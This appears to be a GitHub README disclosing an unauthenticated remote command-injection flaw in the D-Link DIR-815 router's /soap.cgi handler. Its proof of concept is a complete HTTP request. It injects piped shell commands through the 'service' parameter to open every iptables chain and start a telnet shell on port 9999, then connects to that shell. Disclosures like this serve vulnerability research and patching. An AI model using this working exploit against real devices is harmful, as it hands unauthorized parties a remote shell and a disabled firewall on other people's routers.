Skip to content

Latest commit

 

History

History
29 lines (19 loc) · 1 KB

README.md

File metadata and controls

29 lines (19 loc) · 1 KB

dir-815

Exploit Author: yangchunyu@whu.edu.cn

Vendor: D-Link

Firmware: dir815_v1.01SSb08.bin

I found unauthenticated remote code execution vulnerability in soapcgi_main function of cgibin binary.

On the /soap.cgi HTTP POST message on 49152 port, with the service GET parameter, the unauthenticated remote attacker can execute the shell command.

The similar vulnerability already exists with CVE-2018-6530&CVE-2018-20114.

image

With | string, the device can be exploited, too.

poc

nc 192.168.0.1 49152
POST /soap.cgi?service=|iptables -P INPUT ACCEPT|iptables -P FORWARD ACCEPT|iptables -P OUTPUT ACCEPT|iptables -t nat -P PREROUTING ACCEPT|iptables -t nat -P OUTPUT ACCEPT|iptables -t nat -P POSTROUTING ACCEPT|telnetd -p 9999| HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

whatever content...

telnet 192.168.0.1 9999